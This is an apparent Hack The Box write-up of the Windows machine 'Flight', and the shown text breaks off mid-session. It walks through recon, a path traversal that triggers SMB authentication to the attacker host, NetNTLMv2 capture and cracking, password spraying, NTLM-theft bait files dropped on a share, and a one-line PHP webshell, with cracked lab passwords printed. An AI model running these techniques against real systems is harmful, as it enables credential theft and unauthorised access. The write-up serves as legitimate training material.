htb-flight

Flight is a Windows-centered box that puts a unique twist by showing both a Apache and PHP website as well as an internal IIS / ASPX website. I’ll get the PHP site to connect back to my server on SMB, leaking a Net NTLMv2, and crack that to get a plaintext password. I’ll get a list of domain users over RPC, and password spray that password to find another user using the same password. That user has write access to a share, where I’ll drop files designed to provoke another auth back to my server to catch another Net NTLMv2. That user has access to the new IIS site, and can write an ASPX webshell to get a shell as the IIS account. As a service account, it will authenticate over the network as the machine account. I’ll abuse that to get the administrator’s hash and from there a shell.

Recon

nmap

# Nmap 7.93 scan initiated Fri Mar 14 15:20:11 2025 as: nmap -sC -sV -oN flight.nmap 10000 10.10.11.187
Nmap scan report for 10.10.11.187
Host is up (0.0099s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: g0 Aviation
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-14 21:20:23Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-03-14T21:20:27
|_  start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 14 15:21:04 2025 -- 2 IP addresses (1 host up) scanned in 53.39 seconds

This looks like a Windows DC with the domain name flight.htb, and a hostname of G0.

Lots of ports to potentially look at. I’ll prioritize SMB and Web, and check in with LDAP, Kerberos, and DNS if I don’t find what I need from them.

Subdomain Fuzz

Given the use of DNS names, I’ll fuzz port 80 for potential subdomains with wfuzz:

──(puck㉿kali)-[~/htb/flight]
└─$ wfuzz -u http://10.10.11.187 -H "Host: FUZZ.flight.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 7069
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.11.187/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                              
=====================================================================

000000624:   200        90 L     412 W      3996 Ch     "school"                                             

Total time: 0
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 0

I’ll add both to my /etc/hosts file along with the host name:

10.10.11.187 flight.htb school.flight.htb g0.flight.htb

SMB – TCP 445

crackmapexec confirms the domain and host name:

┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb 10.10.11.187 
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)

It isn’t able to get any information about shares:

┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb 10.10.11.187 --shares                       
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [-] Error getting user: list index out of range
SMB         10.10.11.187    445    G0               [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
                                                                                                                      
┌──(puck㉿kali)-[~/htb/flight]
└─$ crackmapexec smb 10.10.11.187 --shares -u puck -p ''    
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [-] flight.htb\puck: STATUS_LOGON_FAILURE 

flight.htb – TCP 80

Site

The site is for an airline:

Most the links are dead or just lead back to this page.

Tech Stack

The “AIRLINES International Travel” link leads to index.html, which suggests this is a static site.

Directory Brute Force

I’ll run feroxbuster against the site, and include -x html,php since I know the site is using .html extensions and potentially PHP:

┌──(puck㉿kali)-[~/htb/flight]
└─$ feroxbuster -u http://flight.htb -x html,php
                                                                                                                      
403      GET        9l       30w      299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       33w      296c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       30w      333c http://flight.htb/images => http://flight.htb/images/
301      GET        9l       30w      329c http://flight.htb/js => http://flight.htb/js/
301      GET        9l       30w      330c http://flight.htb/css => http://flight.htb/css/
200      GET        2l        7w      109c http://flight.htb/images/img3.gif
200      GET        1l        6w      170c http://flight.htb/images/img2.gif
--snip--
503      GET       11l       44w      399c http://flight.htb/examples
200      GET      706l     4305w   291438c http://flight.htb/IMAGES/bg_img.jpg
200      GET        1l        5w      698c http://flight.htb/IMAGES/bg_box1.jpg
403      GET       11l       47w      418c http://flight.htb/licenses
403      GET       11l       47w      418c http://flight.htb/server-status
200      GET      154l      530w     7069c http://flight.htb/Index.html
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_flight_htb-1741963079.state ...
[###############>----] - 26s    70123/90477   8s      found:140     errors:0      
[###############>----] - 26s    69897/90000   2672/s  http://flight.htb/ 
[####################] - 0s     90000/90000   196507/s http://flight.htb/images/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s     90000/90000   494505/s http://flight.htb/js/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s     90000/90000   1875000/s http://flight.htb/css/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s     90000/90000   1323529/s http://flight.htb/js/ie6_warning/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s     90000/90000   187110/s http://flight.htb/Images/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s     90000/90000   2812500/s http://flight.htb/CSS/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s     90000/90000   233766/s http://flight.htb/JS/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s     90000/90000   1914894/s http://flight.htb/JS/ie6_warning/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s     90000/90000   200893/s http://flight.htb/Js/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s     90000/90000   365854/s http://flight.htb/Css/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s     90000/90000   1836735/s http://flight.htb/Js/ie6_warning/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s     90000/90000   264706/s http://flight.htb/IMAGES/ => Directory listing (add --scan-dir-listings to scan)

/phpmyadmin is on the box, but returns a forbidden on visiting:

┌──(puck㉿kali)-[~/htb/flight]
└─$ curl http://flight.htb//phpmyadmin          
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<p>Additionally, a 403 Forbidden
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 Server at flight.htb Port 80</address>
</body></html>

con, aux, and prn all return 403 for .php, but also these return the same for /con and /con.html. It seems more like an Apache rule match than an actual page.

Nothing else of interest.

school.flight.htb

Site

The site is for an aviation school:

Tech Stack

The main page is index.php. In fact, the other pages that have content have URLs of the form http://school.flight.htb/index.php?view=about.html.

It’s a very common PHP structure where different pages on a site all use index.php that defines the header and footer and menus, and then some parameter specifying what page to include as the body. These are often vulnerable to path traversal (reading outside the current directory) and local file include (including PHP code that is executed) vulnerabilities.

Directory Brute Force

feroxbuster finds nothing interesting:

puck@kali$ feroxbuster -u http://school.flight.htb -x html,php

The same false positive blocks for con, aux, and prn show up here.

Auth as svc_apache

File Read

It’s a very common PHP structure where different pages on a site all use index.php with some parameter specifying what page to include. These are often vulnerable to path traversal (reading outside the current directory) and local file include (including PHP code that is executed) vulnerabilities.

On a Linux box, I’d try to read /etc/passwd. Since this is Windows, I’ll try C:\windows\system32\drivers\etc\hosts, but it returns an error:

In fact, just having just view=\ results in the same blocked response. view=. returns nothing, but anything with .. in it also results in the blocked message.

I can try with / instead of \, make sure to use an absolute path, and it works:

Click for full size image

Nothing interesting in that file, but it proves directory traversal and file read. It’s not yet clear if it’s an include or just a read.

RFI Test

HTTP

To figure out if it’s a read or include and if remote files are enabled, I’ll try a remote read over HTTP. This will quickly tell me if remote files are allowed, and if so, show if the site is using include or file_get_contents.

I’ll create a dummy PHP file named poc.txt:

<?php echo 'puck was here'; ?>

I’ll see if the server will load it remotely over HTTP by starting a local HTTP server and trying to include it. It works:

Click for full size image

Unfortunately for me, its the text of the file, not processed as PHP. The source must be using file_get_contents to load the contents, not include.

SMB

Another way to include a file is over SMB. It won’t get anything that HTTP couldn’t get as far as execution, but the user will try to authenticate, and I could capture a NetNTLMv2 challenge/response (not really a hash, but often called one). I’ll start responder with sudo responder -I tun0, and then visit http://school.flight.htb/index.php?view=//10.10.14.4/share/poc.txt. There’s a hit:

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash     : svc_apache::flight:d49bf1afb16b568e:25888B10CFDD1D19B10962508F18B4A0:01010000000000000067B483F894DB017E17EF5DF4D6EB6400000000020008005800520038004C0001001E00570049004E002D005100440042005A00580059005900300052003000380004003400570049004E002D005100440042005A0058005900590030005200300038002E005800520038004C002E004C004F00430041004C00030014005800520038004C002E004C004F00430041004C00050014005800520038004C002E004C004F00430041004C00070008000067B483F894DB01060004000200000008003000300000000000000000000000003000006BB4476AA12502962C1B8BCF41739B8A40001AEC54AC8B29CB7853DCEC60FF3E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0034000000000000000000

Crack NetNTLMv2

john will find the password used by the svc_apache account, “S@Ss!K@*t13”:

┌──(puck㉿kali)-[~/htb/flight]
└─$ john svc_apache-net-ntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
S@Ss!K@*t13      (svc_apache)     
1g 0:00:00:04 DONE (2025-03-14 15:56) 0.2500g/s 2666Kp/s 2666Kc/s 2666KC/s SADSAM..Ryanelkins
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

These creds work over SMB:

┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' 
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 

Auth as S.Moon

SMB Enumeration

Shares

crackmapexec shows the shares, including the standard administrative shares (ADMIN$, C$, and IPC$), the standard shares for a Windows DC (NETLOGON and SYSVOL), and three nonstandard shares (Shared, Users, and Web):

┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --shares 
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [*] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ            
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
SMB         10.10.11.187    445    G0               Users           READ            
SMB         10.10.11.187    445    G0               Web             READ            

I’ll take a look inNETLOGON and SYSVOL, but nothing abnormal or useful jumps out.

Users

The Users share looks like it’s the C:\Users directory on Flight:

┌──(puck㉿kali)-[~/htb/flight]
└─$ smbclient //flight.htb/users -U svc_apache 'S@Ss!K@*t13'
Password for [WORKGROUP\svc_apache]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Thu Sep 22 22:16:56 2022
  ..                                 DR        0  Thu Sep 22 22:16:56 2022
  .NET v4.5                           D        0  Thu Sep 22 21:28:03 2022
  .NET v4.5 Classic                   D        0  Thu Sep 22 21:28:02 2022
  Administrator                       D        0  Mon Oct 31 19:34:00 2022
  All Users                       DHSrn        0  Sat Sep 15 09:28:48 2018
  C.Bum                               D        0  Thu Sep 22 22:08:23 2022
  Default                           DHR        0  Tue Jul 20 21:20:24 2021
  Default User                    DHSrn        0  Sat Sep 15 09:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 09:16:48 2018
  Public                             DR        0  Tue Jul 20 21:23:25 2021
  svc_apache                          D        0  Fri Oct 21 20:50:21 2022

        5056511 blocks of size 4096. 1248963 blocks available
smb: \> 

There’s nothing interesting in svc_apache, and svc_apache can’t get into any of the other directories.

Shared

The Shared share looks to be empty:

puck@kali$ smbclient //flight.htb/shared -U svc_apache 'S@Ss!K@*t13'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Oct 28 20:21:28 2022
  ..                                  D        0  Fri Oct 28 20:21:28 2022

                7706623 blocks of size 4096. 3749019 blocks available

Web

The Web share has folders for the two websites:

┌──(puck㉿kali)-[~/htb/flight]
└─$ smbclient //flight.htb/web -U svc_apache 'S@Ss!K@*t13'
Password for [WORKGROUP\svc_apache]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Mar 14 22:57:00 2025
  ..                                  D        0  Fri Mar 14 22:57:00 2025
  flight.htb                          D        0  Fri Mar 14 22:57:00 2025
  school.flight.htb                   D        0  Fri Mar 14 22:57:00 2025

        5056511 blocks of size 4096. 1249397 blocks available
smb: \>

Looking around shows both are basically static websites, with no database or creds or anything useful at this point. I’ll also confirm that svc_apache can’t write to any of these folders.

Password Spray

List Domain Users

I was able to get another user name, C.Bum, from the users share, but there may be more domain users. I’ll use lookupsid.py from Impacket to get a list of more:

┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@flight.htb 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at flight.htb
[*] StringBinding ncacn_np:flight.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: flight\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: flight\Administrator (SidTypeUser)
501: flight\Guest (SidTypeUser)
--snip--
1613: flight\O.Possum (SidTypeUser)
1614: flight\WebDevs (SidTypeGroup)

I’ll use some Bash foo to get that into a list of usernames:

┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@flight.htb | grep SidTypeUser | cut -d' ' -f 2 | cut -d'\' -f 2 | tee users
Administrator
Guest
krbtgt
G0$
S.Moon
R.Cold
G.Lors
L.Kein
M.Gold
C.Bum
W.Walker
I.Francis
D.Truff
V.Stevens
svc_apache
O.Possum

crackmapexec can also pull this list with the :

┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' -d flight.htb --users 
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.10.11.187    445    G0               Administrator                 2022-09-22 20:17:02 0       Built-in account for administering the computer/domain
SMB         10.10.11.187    445    G0               Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.10.11.187    445    G0               krbtgt                        2022-09-22 19:48:01 0       Key Distribution Center Service Account
SMB         10.10.11.187    445    G0               S.Moon                        2022-09-22 20:08:22 0       Junion Web Developer
SMB         10.10.11.187    445    G0               R.Cold                        2022-09-22 20:08:22 0       HR Assistant
SMB         10.10.11.187    445    G0               G.Lors                        2022-09-22 20:08:22 0       Sales manager
SMB         10.10.11.187    445    G0               L.Kein                        2022-09-22 20:08:22 0       Penetration tester
SMB         10.10.11.187    445    G0               M.Gold                        2022-09-22 20:08:22 0       Sysadmin
SMB         10.10.11.187    445    G0               C.Bum                         2022-09-22 20:08:22 0       Senior Web Developer
SMB         10.10.11.187    445    G0               W.Walker                      2022-09-22 20:08:22 0       Payroll officer
SMB         10.10.11.187    445    G0               I.Francis                     2022-09-22 20:08:22 0       Nobody knows why he's here
SMB         10.10.11.187    445    G0               D.Truff                       2022-09-22 20:08:22 0       Project Manager
SMB         10.10.11.187    445    G0               V.Stevens                     2022-09-22 20:08:22 0       Secretary
SMB         10.10.11.187    445    G0               svc_apache                    2022-09-22 20:08:23 0       Service Apache web
SMB         10.10.11.187    445    G0               O.Possum                      2022-09-22 20:08:23 0       Helpdesk

Spray

It’s not uncommon for someone in charge of a service account to reuse their password with that service account. I’ll see if any of the accounts above share that password with crackmapexec. I always like to use the --continue-on-success in case more than one match:

┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb 10.10.11.187 -u users -p 'S@Ss!K@*t13' -d flight.htb --continue-on-success 
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\krbtgt:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\G0$:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE

S.Moon uses that same password!

Auth as C.Bum

SMB

In addition to the read access, S.Moon has write access to Shared:

┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u S.Moon -p 'S@Ss!K@*t13' --shares 
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [*] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ,WRITE      
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
SMB         10.10.11.187    445    G0               Users           READ            
SMB         10.10.11.187    445    G0               Web             READ   

Capture NetNTLMv2

Background

With write access to an otherwise empty share named Shared, there are files I can drop that might entice any legit visiting user to try to authenticate to my host. This post has a list of some of the ways this can be done. ntlm_theft is a nice tool to create a bunch of these files.

Upload Files

I’ll use ntml_theft.py to create all the files:

┌──(puck㉿kali)-[~/htb/flight/ntlm_theft]
└─$ python ntlm_theft.py -g all -s 10.10.14.4 -f puck
Created: puck/puck.scf (BROWSE TO FOLDER)
Created: puck/puck-(url).url (BROWSE TO FOLDER)
Created: puck/puck-(icon).url (BROWSE TO FOLDER)
Created: puck/puck.lnk (BROWSE TO FOLDER)
Created: puck/puck.rtf (OPEN)
Created: puck/puck-(stylesheet).xml (OPEN)
Created: puck/puck-(fulldocx).xml (OPEN)
Created: puck/puck.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: puck/puck-(includepicture).docx (OPEN)
Created: puck/puck-(remotetemplate).docx (OPEN)
Created: puck/puck-(frameset).docx (OPEN)
Created: puck/puck-(externalcell).xlsx (OPEN)
Created: puck/puck.wax (OPEN)
Created: puck/puck.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: puck/puck.asx (OPEN)
Created: puck/puck.jnlp (OPEN)
Created: puck/puck.application (DOWNLOAD AND OPEN)
Created: puck/puck.pdf (OPEN AND ALLOW)
Created: puck/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: puck/Autorun.inf (BROWSE TO FOLDER)
Created: puck/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

Connecting from the directory with the ntlm_theft output, I’ll upload all of them to the share:

┌──(puck㉿kali)-[~/htb/flight/ntlm_theft/puck]
└─$ smbclient //flight.htb/shared -U S.Moon 'S@Ss!K@*t13'
Password for [WORKGROUP\S.Moon]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Mar 14 23:18:37 2025
  ..                                  D        0  Fri Mar 14 23:18:37 2025

        5056511 blocks of size 4096. 1248834 blocks available
smb: \> prompt false
smb: \> mput *
putting file puck-(stylesheet).xml as \puck-(stylesheet).xml (4.7 kb/s) (average 4.7 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \puck.wax
NT_STATUS_ACCESS_DENIED opening remote file \puck.scf
NT_STATUS_ACCESS_DENIED opening remote file \puck-(remotetemplate).docx
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
putting file puck.application as \puck.application (55.5 kb/s) (average 28.1 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \puck-(icon).url
NT_STATUS_ACCESS_DENIED opening remote file \puck.rtf
NT_STATUS_ACCESS_DENIED opening remote file \puck.lnk
putting file puck.jnlp as \puck.jnlp (5.8 kb/s) (average 20.6 kb/s)
putting file desktop.ini as \desktop.ini (1.4 kb/s) (average 15.9 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \puck-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \puck.htm
NT_STATUS_ACCESS_DENIED opening remote file \puck-(externalcell).xlsx
NT_STATUS_ACCESS_DENIED opening remote file \puck.asx
NT_STATUS_ACCESS_DENIED opening remote file \puck.pdf
NT_STATUS_ACCESS_DENIED opening remote file \puck-(frameset).docx
putting file puck-(fulldocx).xml as \puck-(fulldocx).xml (1243.6 kb/s) (average 398.3 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \puck.m3u
NT_STATUS_ACCESS_DENIED opening remote file \puck-(url).url
smb: \> ls
  .                                   D        0  Fri Mar 14 23:27:19 2025
  ..                                  D        0  Fri Mar 14 23:27:19 2025
  desktop.ini                         A       46  Fri Mar 14 23:27:19 2025
  puck-(fulldocx).xml                 A    72584  Fri Mar 14 23:27:19 2025
  puck-(stylesheet).xml               A      162  Fri Mar 14 23:27:19 2025
  puck.application                    A     1649  Fri Mar 14 23:27:19 2025
  puck.jnlp                           A      191  Fri Mar 14 23:27:19 2025

        5056511 blocks of size 4096. 1248814 blocks available
smb: \> 

Interestingly, a bunch are blocked. But a few do make it.

Responder

With responder still running, after a minute or two there’s a hit from C.Bum:

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash     : c.bum::flight.htb:952d95ad83925991:C89061B541623C50B94E338EC0561438:01010000000000000081AC2FFE94DB01334B6C122F9237C500000000020008004B0044003800410001001E00570049004E002D0043004C0032003700590031005500410043004A005A0004003400570049004E002D0043004C0032003700590031005500410043004A005A002E004B004400380041002E004C004F00430041004C00030014004B004400380041002E004C004F00430041004C00050014004B004400380041002E004C004F00430041004C00070008000081AC2FFE94DB01060004000200000008003000300000000000000000000000003000006BB4476AA12502962C1B8BCF41739B8A40001AEC54AC8B29CB7853DCEC60FF3E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0034000000000000000000

Crack NetNTLMv2

john with rockyou will quickly return the password “Tikkycoll_431012284”:

┌──(puck㉿kali)-[~/htb/flight]
└─$ john c.bum-net-ntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Tikkycoll_431012284 (c.bum)     
1g 0:00:00:03 DONE (2025-03-14 16:33) 0.3003g/s 3164Kp/s 3164Kc/s 3164KC/s TinyMutt69..Thehunter22
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

It works:

┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u c.bum -p 'Tikkycoll_431012284' 
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\c.bum:Tikkycoll_431012284 

Shell as svc_apache

Webshell

SMB

C.Bum has write access to the Web share:

┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u c.bum -p 'Tikkycoll_431012284' --shares 
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.187    445    G0               [+] flight.htb\c.bum:Tikkycoll_431012284 
SMB         10.10.11.187    445    G0               [*] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ,WRITE      
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
SMB         10.10.11.187    445    G0               Users           READ            
SMB         10.10.11.187    445    G0               Web             READ,WRITE      

Upload Webshell

I’ll start with a standard webshell, shell.php:

<?php system($_REQUEST['cmd']); ?>

I’ll move into the styles directory in school.flight.htb, and upload it there:

┌──(puck㉿kali)-[~/htb/flight]
└─$ smbclient //flight.htb/web -U c.bum 'Tikkycoll_431012284' 
Password for [WORKGROUP\c.bum]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Mar 14 23:37:14 2025
  ..                                  D        0  Fri Mar 14 23:37:14 2025
  flight.htb                          D        0  Fri Mar 14 23:37:00 2025
  school.flight.htb                   D        0  Fri Mar 14 23:37:00 2025

        5056511 blocks of size 4096. 1248132 blocks available
smb: \> cd school.flight.htb
smb: \school.flight.htb\> ls
  .                                   D        0  Fri Mar 14 23:42:00 2025
  ..                                  D        0  Fri Mar 14 23:42:00 2025
  about.html                          A     1689  Tue Oct 25 05:54:45 2022
  blog.html                           A     3618  Tue Oct 25 05:53:59 2022
  home.html                           A     2683  Tue Oct 25 05:56:58 2022
  images                              D        0  Fri Mar 14 23:42:00 2025
  index.php                           A     2092  Thu Oct 27 09:59:25 2022
  lfi.html                            A      179  Thu Oct 27 09:55:16 2022
  styles                              D        0  Fri Mar 14 23:42:00 2025

        5056511 blocks of size 4096. 1248132 blocks available
smb: \school.flight.htb\> cd styles
smb: \school.flight.htb\styles\> ls
  .                                   D        0  Fri Mar 14 23:42:00 2025
  ..                                  D        0  Fri Mar 14 23:42:00 2025
